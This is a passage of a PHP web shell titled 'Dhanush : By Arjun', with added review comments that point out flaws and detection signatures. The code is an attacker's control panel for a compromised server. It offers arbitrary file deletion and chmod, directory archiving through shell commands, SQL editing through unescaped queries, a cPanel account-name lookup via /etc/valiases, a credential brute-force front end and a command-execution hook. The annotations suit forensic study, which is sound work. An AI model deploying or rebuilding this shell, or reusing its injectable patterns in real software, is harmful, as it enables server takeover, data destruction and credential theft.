4454 $key = "";
4455 for( $i = 0; $i < $num; $i++ )
4456 {
4457 $field = mysql_fetch_field( $pResult, $i );
4458 if( $field->primary_key == 1 )
4459 if( $field->numeric == 1 )
4460 $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
4461 else
4462 $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
4463 }
4464 $key = substr( $key, 0, strlen($key)-4 );
4465
4466 mysql_select_db( $dbname, $mysqlHandle );
 // Fetch the row being edited; $rowid is neither quoted nor escaped.
4467 $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle );
4468 $data = mysql_fetch_array( $pResult );
4469
4470 echo "<table cellspacing=1 cellpadding=2 border=1>\n";
4471 echo "<tr>\n";
4472 echo "<th>Name</th>\n";
4473 echo "<th>Type</th>\n";
4474 echo "<th>Function</th>\n";
4475 echo "<th>Data</th>\n";
4476 echo "</tr>\n";
4477
4478 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
4479 $num = mysql_num_rows( $pResult );
4480
4481 $pResultLen = mysql_list_fields( $dbname, $tablename );
 // $fundata1/$fundata2 become the argument lists of the editdata() JS calls on
 // the two buttons: a flat name,value,name,value,... sequence.
4482 $fundata1 = "'action','editsubmitData','dbname','".$dbname."','tablename','".$tablename."',";
4483 $fundata2 = "'action','insertdata','dbname','".$dbname."','tablename','".$tablename."',";
4484 for( $i = 0; $i < $num; $i++ )
4485 {
4486 $field = mysql_fetch_array( $pResult );
4487 $fieldname = $field["Field"];
4488 $fieldtype = $field["Type"];
4489 $len = mysql_field_len( $pResultLen, $i );
4490
4491 echo "<tr>";
4492 echo "<td>$fieldname</td>";
4493 echo "<td>".$field["Type"]."</td>";
4494 echo "<td>\n";
 // The "<field>_function" select is emitted but nothing in this chunk reads it.
4495 echo "<select name=${fieldname}_function class=sbox>\n";
4496 echo "<option>\n";
4497 echo "<option>ASCII\n";
4498 echo "<option>CHAR\n";
4499 echo "<option>SOUNDEX\n";
4500 echo "<option>CURDATE\n";
4501 echo "<option>CURTIME\n";
4502 echo "<option>FROM_DAYS\n";
4503 echo "<option>FROM_UNIXTIME\n";
4504 echo "<option>NOW\n";
4505 echo "<option>PASSWORD\n";
4506 echo "<option>PERIOD_ADD\n";
4507 echo "<option>PERIOD_DIFF\n";
4508 echo "<option>TO_DAYS\n";
4509 echo "<option>USER\n";
4510 echo "<option>WEEKDAY\n";
4511 echo "<option>RAND\n";
4512 echo "</select>\n";
4513 echo "</td>\n";
 // Current cell value (HTML-escaped). The type string is tokenised so that
 // enum/set definitions can be split into their quoted members.
4514 $value = htmlspecialchars($data[$i]);
4515 $type = strtok( $fieldtype, " (,)\n" );
4516 if( $type == "enum" || $type == "set" )
4517 {
4518 echo "<td>\n";
4519 if( $type == "enum" )
4520 echo "<select name=$fieldname class=box>\n";
4521 else if( $type == "set" )
4522 echo "<select name=$fieldname size=4 class=box multiple>\n";
 // Alternate strtok calls: one returns a member, the next skips the separator.
4523 while( $str = strtok( "'" ) )
4524 {
4525 if( $value == $str )
4526 echo "<option selected>$str\n";
4527 else
4528 echo "<option>$str\n";
4529 strtok( "'" );
4530 }
4531 echo "</select>\n";
4532 echo "</td>\n";
4533 }
4534 else
4535 {
 // Note the inconsistency: the short input is name=sql_<field> with
 // id=dhanush_<field>, while the textarea is name=dhanush_<field> with no id.
 // The JS editdata() call reads dhanush_<field>.value for both.
4536 if( $len < 40 )
4537 echo "<td><input type=text size=40 maxlength=$len id=dhanush_$fieldname name=sql_$fieldname value=\"$value\" class=box></td>\n";
4538 else
4539 echo "<td><textarea cols=47 rows=3 maxlength=$len name=dhanush_$fieldname class=box>$value</textarea>\n";
4540 }
4541 $fundata1 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
4542 $fundata2 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
4543 echo "</tr>";
4544 }
 // Strip the trailing comma (eregi_replace: removed in PHP 7).
4545 $fundata1=eregi_replace(',$', '', $fundata1);
4546 $fundata2=eregi_replace(',$', '', $fundata2);
4547
4548 echo "</table><p>\n";
4549 echo "<input type=button onClick=\"editdata($fundata1)\" value='Edit Data' class=but>\n";
4550 echo "<input type=button value='Insert' onClick=\"editdata($fundata2)\" class=but>\n";
4551 echo "</form>\n";
4552 }
4553 }
4554// Edit Submit Table Data: action=editsubmitData (POSTed by the editdata() JS
// helper) issues an UPDATE built from every column value found in the request.
// NOTE(review): column values are taken from $_REQUEST[<column name>] and
// concatenated into SQL with no escaping; $rowid is unquoted; $str is appended
// to before it is initialised; the query result is never checked.
4555else if($_REQUEST['action'] == "editsubmitData")
4556{
4557 $dbserver = $_COOKIE["dbserver"];
4558 $dbuser = $_COOKIE["dbuser"];
4559 $dbpass = $_COOKIE["dbpass"];
4560 $dbname = $_POST['dbname'];
4561 $tablename = $_POST['tablename'];
4562
4563 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4564 mysql_select_db($dbname);
4565
 // Primary-key column name; the key value is the POST field of that name.
4566 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4567 $row = mysql_fetch_array($sql);
4568 $row = $row['COLUMN_NAME'];
4569 $rowid = $_POST[$row];
4570
4571 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
4572 $num = mysql_num_rows( $pResult );
4573
4574 $rowcount = $num;
4575
 // $pResultLen is fetched but not used in this branch.
4576 $pResultLen = mysql_list_fields( $dbname, $tablename );
4577
 // One " col = 'value'" fragment per column, comma-separated except the last.
4578 for( $i = 0; $i < $num; $i++ )
4579 {
4580 $field = mysql_fetch_array( $pResult );
4581 $fieldname = $field["Field"];
4582 $arrdata = $_REQUEST[$fieldname];
4583
4584 $str .= " " . $fieldname . " = '" . $arrdata . "'";
4585 $rowcount--;
4586 if($rowcount != 0)
4587 $str .= ",";
4588 }
4589
4590 $str = "update $tablename set" . $str . " where $row=$rowid";
4591 mysql_query($str);
 // Only an empty placeholder div is returned to the caller.
4592 ?><div id="showsql"></div><?php
4593}
4594// Insert Table Data: action=insertdata (POSTed by the editdata() JS helper)
// builds an INSERT from every column of the table.
// NOTE(review): same pattern as editsubmitData — request values go into SQL
// unescaped, $str1/$str2 are appended to before initialisation, and the result
// of mysql_query is not checked. $rowid is computed but never used here.
4595else if($_REQUEST['action'] == "insertdata")
4596{
4597 $dbserver = $_COOKIE["dbserver"];
4598 $dbuser = $_COOKIE["dbuser"];
4599 $dbpass = $_COOKIE["dbpass"];
4600 $dbname = $_POST['dbname'];
4601 $tablename = $_POST['tablename'];
4602
4603 $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
4604 mysql_select_db($dbname);
4605
4606 $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
4607 $row = mysql_fetch_array($sql);
4608 $row = $row['COLUMN_NAME'];
4609 $rowid = $_POST[$row];
4610
4611 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
4612 $num = mysql_num_rows( $pResult );
4613
4614 $rowcount = $num;
4615
 // $pResultLen is fetched but not used in this branch.
4616 $pResultLen = mysql_list_fields( $dbname, $tablename );
4617
 // $str1 collects column names, $str2 the quoted values, both comma-terminated.
4618 for( $i = 0; $i < $num; $i++ )
4619 {
4620 $field = mysql_fetch_array( $pResult );
4621 $fieldname = $field["Field"];
4622 $arrdata = $_REQUEST[$fieldname];
4623
4624 $str1 .= "".$fieldname . ",";
4625 $str2 .= "'".$arrdata . "',";
4625 $rowcount--;
 // This conditional body is entirely commented out; $rowcount is effectively
 // unused.
4627 if($rowcount != 0)
4628 {
4629 //$str1 .= $fieldname . ",";
4630 //$str2 .= $arrdata . ",";
4631 }
4632 }
 // Strip the trailing commas (eregi_replace: removed in PHP 7).
4633 $str1=eregi_replace(',$', '', $str1);
4634 $str2=eregi_replace(',$', '', $str2);
4635 $str = "INSERT INTO `$tablename` ($str1) VALUES ($str2);";
4636 mysql_query($str);
4637
4638 ?><div id="showsql"></div><?php
4639}
// "Log out" of the database panel.
// NOTE(review): setcookie()'s second argument is the cookie *value*, not its
// expiry, so these calls do not delete the credential cookies — they overwrite
// each one with a past timestamp as its value (and no expiry, i.e. a session
// cookie). isset($_COOKIE['dbserver']) therefore stays true afterwards.
// $self is not assigned in this branch, and there is no exit after header().
4640else if(isset($_GET['logoutdb']))
4641{
4642 setcookie("dbserver",time() - 60*60);
4643 setcookie("dbuser",time() - 60*60);
4644 setcookie("dbpass",time() - 60*60);
4645 header("Location:$self");
4646}
// Bulk file operations on the paths selected in the file-listing form. The
// myaction() JS helper POSTs choice=<op>&chmode=<mode>&actbox[]=<comma-joined
// list of selected paths>.
// NOTE(review): in every branch the `foreach ($actbox as $myv)` loop has no
// braces, so only the explode() is repeated; after the loop $myv holds the
// exploded *last* element of $actbox and only that element's paths are
// processed. Paths are taken from the request as-is, with no restriction on
// where they point. Detection: POST bodies to this script containing
// "choice=delete|chmod|changefileperms|compre|uncompre" with "actbox[]=".
4647else if(isset($_POST['choice']))
4648{
 // --- delete: unlink files, recurse into directories via rrmdir() (defined
 // elsewhere in the file).
4649 if($_POST['choice'] == "delete")
4650 {
4651 $actbox = $_POST["actbox"];
4652
4653 foreach ($actbox as $myv)
4654 $myv = explode(",",$myv);
4655 foreach ($myv as $v)
4656 {
4657 if(is_file($v))
4658 {
4659 if(unlink($v))
4660 echo "<br><center><font class=txt>File $v Deleted Successfully</font></center>";
4661 else
4662 echo "<br><center>Cannot Delete File $v</center>";
4663 }
4664 else if(is_dir($v))
4665 {
4666 rrmdir($v);
4667 }
4668 }
4669 }
 // --- chmod: render a small form (hidden actbox3[] inputs plus a mode field)
 // whose button triggers the changefileperms branch below. $v is echoed into
 // the value attribute unescaped.
4670 else if($_POST['choice'] == "chmod")
4671 { ?>
4672 <form id="chform"><?php
4673 $actbox1 = $_POST['actbox'];
4674 foreach ($actbox1 as $myv)
4675 $myv = explode(",",$myv);
4676 foreach ($myv as $v)
4677 { ?>
4678 <input type="hidden" name="actbox3[]" id="actbox3[]" value="<?php echo $v; ?>">
4679 <?php }
4680 ?>
4681 <table align="center" border="3" style="width:40%; border-color:#333333;">
4682 <tr>
4683 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
4684 </tr>
4685 <tr>
4686 <td colspan="2" align="center" style="height:60px">
4687 <input type="button" onClick="myaction('changefileperms',chmode.value)" value="Change Permission" class="but" style="padding: 5px;" /></td>
4688 </tr>
4689 </table>
4690
4691 </form> <?php
4692 }
 // --- changefileperms: apply chmode (a digit string such as "0755") to each
 // selected path. is_numeric() is the only validation of the mode.
4693 else if($_POST['choice'] == "changefileperms")
4694 {
4695 if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
4696 {
4697 $actbox = $_POST["actbox"];
4698 foreach ($actbox as $myv)
4699 $myv = explode(",",$myv);
4700 foreach ($myv as $v)
4701 {
4702 if(is_file($v) || is_dir($v))
4703 {
 // Manual base-8 conversion of the digit string (least significant
 // digit first); @ suppresses any chmod() warning.
4704 $perms = 0;
4705 for($i=strlen($_POST['chmode'])-1;$i>=0;--$i)
4706 $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
4707 echo "<div align=left style=width:60%;>";
4708 if(@chmod($v,$perms))
4709 echo "<font class=txt>File $v Permissions Changed Successfully</font><br>";
4710 else
4711 echo "Cannot Change $v File Permissions<br>";
4712 echo "</div>";
4713 }
4714 }
4715
4716 }
4717 }
 // --- compre: files are zipped with ZipArchive; directories are tarred via
 // execmd() (defined elsewhere) with $v placed in the shell command unescaped.
4718 else if($_POST['choice'] == "compre")
4719 {
4720 $actbox = $_POST["actbox"];
4721 foreach ($actbox as $myv)
4722 $myv = explode(",",$myv);
4723 foreach ($myv as $v)
4724 {
4725 if(is_file($v))
4726 {
 // The archive is created in the current working directory and the
 // entry added is basename($v), not $v, so a file outside the cwd is
 // not what gets archived. The "Error" message uses single quotes,
 // so "$v" is printed literally, and addFile()/close() run regardless
 // of whether open() succeeded.
4727 $zip = new ZipArchive();
4728 $filename= basename($v) . '.zip';
4729 if(($zip->open($filename, ZipArchive::CREATE))!==true)
4730 { echo '<br><font size=3>Error: Unable to create zip file for $v</font>';}
4731 else {echo "<br><font class=txt size=3>File $v Compressed successfully</font>";}
4732 $zip->addFile(basename($v));
4733 $zip->close();
4734 }
4735 else if(is_dir($v))
4736 {
 // $os is set elsewhere in the file; nothing happens for non-Linux hosts.
4737 if($os == "Linux")
4738 {
4739 $filename= basename($v);
4740 execmd("tar --create --recursion --file=$filename.tar $v");
4741 echo "<br><font class=txt size=3>File $v Compressed successfully as $v.tar</font>";
4742 }
4743 }
4744 }
4745 }
 // --- uncompre: open basename($v) as a zip (relative to the cwd) and extract
 // it into a directory named after the part before the first ".".
4746 else if($_POST['choice'] == "uncompre")
4747 {
4748 $actbox = $_POST["actbox"];
4749 foreach ($actbox as $myv)
4750 $myv = explode(",",$myv);
4751 foreach ($myv as $v)
4752 {
4753 if(is_file($v) || is_dir($v))
4754 {
4755 $zip = new ZipArchive;
4756 $filename= basename($v);
4757 $res = $zip->open($filename);
4758 if ($res === TRUE)
4759 {
4760 $pieces = explode(".",$filename);
4761 $zip->extractTo($pieces[0]);
4762 $zip->close();
4763 echo "<br><font class=txt size=3>File $v Unzipped successfully</font>";
4764 } else
4765 echo "<br><font size=3>Error: Unable to Unzip file $v</font>";
4766 }
4767 }
4768 }
4769}
// Resolve a hosting account name from a domain by listing /etc/valiases/<domain>
// (a cPanel layout) through myexe(), which is defined elsewhere in the file.
// NOTE(review): $sitename is placed in the shell command without
// escapeshellarg(); only the scheme/"www." prefixes are stripped. The second
// str_replace can never match, because the first one already removed every
// "http://". Detection: GET requests to this script with a "sitename" parameter.
4770else if(isset($_GET['sitename']))
4771{
4772 $sitename = str_replace("http://","",$_GET['sitename']);
4773 $sitename = str_replace("http://www.","",$sitename);
4774 $sitename = str_replace("www.","",$sitename);
4775 $show = myexe("ls -la /etc/valiases/".$sitename);
4776 if(!empty($show))
4777 echo $show;
4778 else
4779 echo "Cannot get the username";
4780}
// ?mydata — render the database list (listdatabase() is defined elsewhere).
// Triggered by the mydatago() JS helper after credentials have been submitted.
4781else if(isset($_GET['mydata']))
4782{
4783 listdatabase();
4784}
// ?home=<path> — render the directory listing for <path> via mainfun() (defined
// elsewhere). The path is taken from the request without restriction.
4785else if(isset($_GET['home']))
4786{
4787 mainfun($_GET['home']);
4788}
// ?dir&myfilepath=<path> — same as ?home, but the path is read from the
// "myfilepath" parameter (the value of "dir" itself is ignored). This is what
// the changedir() JS helper requests.
4789else if(isset($_GET['dir']))
4790{
4791 mainfun($_GET['myfilepath']);
4792}
// ?mydirpath=<path> — report whether <path> is writable by the web-server
// process; polled by the wrtblDIR() JS helper on every directory change.
4793else if(isset($_GET['mydirpath']))
4794{
4795 echo is_writable($_GET['mydirpath'])?"<font class=txt>< writable ></font>":"< not writable >";
4796}
4797else
4798{
4799?>
4800<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
4801<title>Dhanush : By Arjun</title>
4802<script type="text/javascript">
// Page-wide state for the client side of the shell: `checked` (an implicit
// global — no var) toggles the select-all checkbox state, `waitstate` is the
// placeholder markup written into a target element while an XHR is in flight.
4803checked = false;
4804var waitstate = "<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
// Flip the global `checked` flag and apply it to every element of the form
// with id "myform" (every element, not only checkboxes).
4805function checkedAll ()
4806{
4807 if (checked == false){checked = true}else{checked = false}
4808 for (var i = 0; i < document.getElementById('myform').elements.length; i++)
4809 {
4810 document.getElementById('myform').elements[i].checked = checked;
4811 }
4812}
// Build the breadcrumb HTML for a filesystem path: one changedir('dir', …) link
// per path component. The separator is injected by PHP from $directorysperator
// (defined elsewhere in the file); on Linux a leading "/" link is added.
4813function urlchange(myfilepath)
4814{
4815 var mypath, mpath, i, t, j, r = "",myurl = "",splitter="";
4816 splitter = "<?php echo addslashes($directorysperator); ?>";
4817 mypath = mpath = myfilepath.split(splitter);
4818 <?php if($os == "Linux") { ?>
4819 r = "/";
4820 myurl = "<a href=javascript:void(0) onClick=\"changedir('dir','/')\">/</a>";
4821 <?php } ?>
 // r accumulates the path prefix up to and including the current component.
4822 for (i = 0; i < mypath.length; i++)
4823 {
4824 if(mypath[i] == "")
4825 continue;
4826 r += mypath[i]+"<?php echo addslashes($directorysperator); ?>";
4827
4828 myurl += "<a href=javascript:void(0) onClick=\"changedir('dir','"+r+"\')\"><b>"+mypath[i]+"<?php echo addslashes($directorysperator); ?></b></a>";
4829 }
 // Double every backslash so the generated onClick strings survive as HTML.
4830 myurl = myurl.replace(/\\/g,"\\\\");
4831 return myurl;
4832}
// Ask the server (?mydirpath=…) whether a directory is writable and copy the
// answer into four elements named "wrtble". `i` is an implicit global, and if
// fewer than four such elements exist the assignment on an undefined element
// throws. The path is appended to the URL without encoding.
4833function wrtblDIR(mydirpath)
4834{
4835 var ajaxRequest;
4836 ajaxRequest = new XMLHttpRequest();
4837
4838 ajaxRequest.onreadystatechange = function()
4839 {
4840 if(ajaxRequest.readyState == 4)
4841 {
4842 for(i=0;i<=3;i++)
4843 document.getElementsByName("wrtble")[i].innerHTML=ajaxRequest.responseText;
4844 }
4845 }
4846
4847 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?&mydirpath="+mydirpath, true);
4848 ajaxRequest.send(null);
4849}
// Propagate the current directory into every path input on the page, refresh
// the writable indicator, and clear the "showdir" status area.
// The "createfolder" assignment is duplicated.
4850function setpath(myfilpath)
4851{
4852 wrtblDIR(myfilpath);
4853 document.getElementById("path").value=myfilpath;
4854 document.getElementById("createfile").value=myfilpath;
4855 document.getElementById("createfolder").value=myfilpath;
4856 document.getElementById("createfolder").value=myfilpath;
4857 document.getElementById("exepath").value=myfilpath;
4858 document.getElementById("auexepath").value=myfilpath;
4859 document.getElementById("showdir").innerHTML="";
4860}
// Navigate to a directory: GET ?<myaction>&myfilepath=<path>, then install the
// response as the main listing, update the path inputs and the breadcrumb.
// The path is not URL-encoded, so "&" or "#" in a name breaks the request.
4861function changedir(myaction,myfilepath)
4862{
4863 var myurl = urlchange(myfilepath);
4864
4865 document.getElementById("showmaindata").innerHTML=waitstate;
4866 var ajaxRequest;
4867 ajaxRequest = new XMLHttpRequest();
4868
4869 ajaxRequest.onreadystatechange = function()
4870 {
4871 if(ajaxRequest.readyState == 4)
4872 {
4873 setpath(myfilepath);
4874 document.getElementById("crdir").innerHTML=myurl;
4875 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
4876 }
4877 }
4878
4879 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
4880 ajaxRequest.send(null);
4881}
// Like changedir(), but the request is ?<myaction>=<dir> (this is the shape the
// PHP ?home=<path> branch expects). Response goes into "showmaindata".
4882function gethome(myaction,mydir)
4883{
4884 var myurl = urlchange(mydir);
4885 document.getElementById("showmaindata").innerHTML=waitstate;
4886 var ajaxRequest;
4887 ajaxRequest = new XMLHttpRequest();
4888
4889 ajaxRequest.onreadystatechange = function()
4890 {
4891 if(ajaxRequest.readyState == 4)
4892 {
4893 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
4894 setpath(mydir);
4895 document.getElementById("crdir").innerHTML=myurl;
4896 }
4897 }
4898
4899 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+mydir, true);
4900 ajaxRequest.send(null);
4901}
// GET ?sitename=<domain> (the /etc/valiases lookup branch) and show the raw
// response in "showsite". The domain is not URL-encoded.
4902function getname(sitename)
4903{
4904 document.getElementById("showsite").innerHTML=waitstate;
4905 var ajaxRequest;
4906 ajaxRequest = new XMLHttpRequest();
4907
4908 ajaxRequest.onreadystatechange = function()
4909 {
4910 if(ajaxRequest.readyState == 4)
4911 {
4912 document.getElementById("showsite").innerHTML=ajaxRequest.responseText;
4913 }
4914 }
4915
4916 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?sitename="+sitename, true);
4917 ajaxRequest.send(null);
4918}
// POST a bulk file operation (choice=<myfileaction>) for the checked "actbox[]"
// boxes. `mychoice` is filled only at the indices of checked boxes, so when it
// is stringified into the URL the holes become empty entries — the server
// receives one comma-joined value such as "a,,b,," and explode()s it. Nothing
// is URL-encoded.
4919function myaction(myfileaction,chmode)
4920{
4921 var mytype = document.getElementsByName('actbox[]');
4922 var mychoice = new Array();
4923
4924 for (var i = 0, length = mytype.length; i < length; i++)
4925 {
4926 if (mytype[i].checked)
4927 mychoice[i] = mytype[i].value;
4928 }
4929
4930 var params = "choice="+myfileaction+"&chmode="+chmode+"&actbox[]="+mychoice;
4931
4932 document.getElementById("showdir").innerHTML=waitstate;
4933 var ajaxRequest;
4934 ajaxRequest = new XMLHttpRequest();
4935
4936 ajaxRequest.onreadystatechange = function()
4937 {
4938 if(ajaxRequest.readyState == 4)
4939 {
4940 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
4941 }
4942 }
4943
4944 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
4945 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
4946 ajaxRequest.send(params);
4947}
// Submit the row-edit form. Called with a flat argument list
// (name, value, name, value, …) assembled by the PHP editData branch:
// arguments[0] is the parameter name ("action"), arguments[1] its value, then
// dbname, tablename and one dhanush_<column> pair per column.
// Odd indices are values (followed by "&"), even indices are names (followed
// by "="); the trailing "&" is sliced off. The "dhanush_" prefix is removed
// from the whole string — values included — so the server reads plain column
// names. Values are not URL-encoded. `var result` is redeclared (harmless).
4948function editdata()
4949{
4950 var result = "", // initialize list
4951 i,dbname,tablename;
4952 // iterate through arguments
4953 for (i = 1; i < arguments.length; i++)
4954 {
4955 if(i%2 == 0)
4956 result += arguments[i]+'=';
4957 else
4958 result += arguments[i]+'&';
4959 }
4960 result = result.slice(0, -1);
4961
4962 dbname = arguments[3];
4963 tablename = arguments[5];
4964 var result=result.replace(/dhanush_/g,"");
4965 var params = arguments[0]+"="+result;
4966
4967 document.getElementById("showsql").innerHTML=waitstate;
4968 var ajaxRequest;
4969 ajaxRequest = new XMLHttpRequest();
4970
 // The response body is discarded; the table list is simply reloaded.
4971 ajaxRequest.onreadystatechange = function()
4972 {
4973 if(ajaxRequest.readyState == 4)
4974 {
4975 viewtables('listTables',dbname,tablename);
4976 }
4977 }
4978
4979 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
4980 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
4981 ajaxRequest.send(params);
4982}
// Generic dispatcher for the database panel: GET ?action=<action>&dbname=…&
// tablename=…&<rowid>=<arrdata>&executemyquery=…&fieldname=…&page=….
// Note the dynamically named "<rowid>" parameter — this is how the PHP
// deleteData/editData branches receive the primary-key value via $_GET[$row].
// Absent arguments are sent literally as "undefined"; nothing is URL-encoded.
4983function viewtables(action,dbname,tablename,rowid,arrdata,executequery,fieldname,page)
4984{
4985 document.getElementById("showsql").innerHTML=waitstate;
4986 var ajaxRequest;
4987 ajaxRequest = new XMLHttpRequest();
4988
4989 ajaxRequest.onreadystatechange = function()
4990 {
4991 if(ajaxRequest.readyState == 4)
4992 {
4993 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
4994 }
4995 }
4996
4997 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?action="+action+"&dbname="+dbname+"&tablename="+tablename+"&"+rowid+"="+arrdata+"&executemyquery="+executequery+"&fieldname="+fieldname+"&page="+page, true);
4998 ajaxRequest.send(null);
4999}
// Submit database credentials: GET ?executeit&server=…&username=…&password=….
// NOTE(review): the password travels in the query string, so it is written to
// web-server access logs and proxy logs in clear text — a useful forensic
// artefact when reviewing a compromised host. On completion mydatago() loads
// the database list.
5000function mydatabase(server,username,password)
5001{
5002 document.getElementById("showsql").innerHTML=waitstate;
5003 var ajaxRequest;
5004 ajaxRequest = new XMLHttpRequest();
5005
5006 ajaxRequest.onreadystatechange = function()
5007 {
5008 if(ajaxRequest.readyState == 4)
5009 {
5010 mydatago();
5011 }
5012 }
5013
5014 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executeit&server="+server+"&username="+username+"&password="+password, true);
5015 ajaxRequest.send(null);
5016}
// GET ?mydata (the listdatabase() branch), hide the credential table and show
// the returned database list in "showsql".
5017function mydatago()
5018{
5019 var ajaxRequest;
5020 ajaxRequest = new XMLHttpRequest();
5021
5022 ajaxRequest.onreadystatechange = function()
5023 {
5024 if(ajaxRequest.readyState == 4)
5025 {
5026 document.getElementById("datatable").style.display = 'none';
5027 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
5028 }
5029 }
5030
5031 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?mydata", true);
5032 ajaxRequest.send(null);
5033}
// Front end of the shell's credential-guessing feature: finds the checked
// "mytype" radio button and the "reverse" checkbox, then GETs ?prototype=…&
// serverport=…&login=…&dict=…&type=…&reverse=…. If no radio is checked the loop
// exits with i == length and mytype[i].value throws.
// Detection: requests to this script carrying "prototype=" together with
// "dict=" and "serverport=".
5034function bruteforce(prototype,serverport,login,dict)
5035{
5036 var mytype = document.getElementsByName('mytype');
5037 for (var i = 0, length = mytype.length; i < length; i++)
5038 {
5039 if (mytype[i].checked)
5040 break;
5041 }
5042 var getreverse = 0;
5043 if(document.getElementById('reverse').checked == true)
5044 getreverse = 1;
5045 else
5046 getreverse = 0;
5047
5048 document.getElementById("showbrute").innerHTML=waitstate;
5049 var ajaxRequest;
5050 ajaxRequest = new XMLHttpRequest();
5051
5052 ajaxRequest.onreadystatechange = function()
5053 {
5054 if(ajaxRequest.readyState == 4)
5055 {
5056 document.getElementById("showbrute").innerHTML=ajaxRequest.responseText;
5057 }
5058 }
5059
5060 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?prototype="+prototype+"&serverport="+serverport+"&login="+login+"&dict="+dict+"&type="+mytype[i].value+"&reverse="+getreverse, true);
5061 ajaxRequest.send(null);
5062}
// GET ?<action>&executepath=<dir>&execute=<value> and show the response in the
// main pane. Which PHP branch handles this is outside this chunk.
5063function executemyfile(action,executepath,execute)
5064{
5065 document.getElementById("showmaindata").innerHTML=waitstate;
5066 var ajaxRequest;
5067 ajaxRequest = new XMLHttpRequest();
5068
5069 ajaxRequest.onreadystatechange = function()
5070 {
5071 if(ajaxRequest.readyState == 4)
5072 {
5073 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
5074 }
5075 }
5076
5077 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+action+"&executepath="+executepath+"&execute="+execute, true);
5078 ajaxRequest.send(null);
5079}
// GET ?<myaction>=<myaction>&dir=<dir> and replace the main pane; the "showdir"
// status area is cleared afterwards. (The PHP ?dir branch in this file reads
// "myfilepath", not "dir", so for myaction == 'dir' the path sent here would
// appear to be ignored — verify against the other branches.)
5080function maindata(myaction,dir)
5081{
5082 document.getElementById("showmaindata").innerHTML=waitstate;
5083 var ajaxRequest;
5084 ajaxRequest = new XMLHttpRequest();
5085
5086 ajaxRequest.onreadystatechange = function()
5087 {
5088 if(ajaxRequest.readyState == 4)
5089 {
5090 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
5091 document.getElementById("showdir").innerHTML="";
5092 }
5093 }
5094
5095 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+myaction+"&dir="+dir, true);
5096 ajaxRequest.send(null);
5097}
// POST scriptlocator=scriptlocator&passwd=<passwd>. The encoded copy in
// `message` is computed but never used — the raw value is sent instead.
5098function manuallyscriptfn(passwd)
5099{
5100 var message = encodeURIComponent(passwd);
5101 var params = "scriptlocator=scriptlocator&passwd="+passwd;
5102 document.getElementById("showdata").innerHTML=waitstate;
5103 var ajaxRequest;
5104 ajaxRequest = new XMLHttpRequest();
5105
5106 ajaxRequest.onreadystatechange = function()
5107 {
5108 if(ajaxRequest.readyState == 4)
5109 {
5110 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
5111 }
5112 }
5113
5114 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5115 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5116 ajaxRequest.send(params);
5117}
// POST 404page=404page&message=<encoded message> and show the response in
// "showdata". `var message` re-declares the parameter, which is allowed and
// simply reassigns it.
5118function my404page(message)
5119{
5120 var message = encodeURIComponent(message);
5121 var params = "404page=404page&message="+message;
5122 document.getElementById("showdata").innerHTML=waitstate;
5123 var ajaxRequest;
5124 ajaxRequest = new XMLHttpRequest();
5125
5126 ajaxRequest.onreadystatechange = function()
5127 {
5128 if(ajaxRequest.readyState == 4)
5129 {
5130 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
5131 }
5132 }
5133
5134 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5135 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5136 ajaxRequest.send(params);
5137}
// Command-execution front end: GET ?executepath=<dir>&executemycmd=<command>
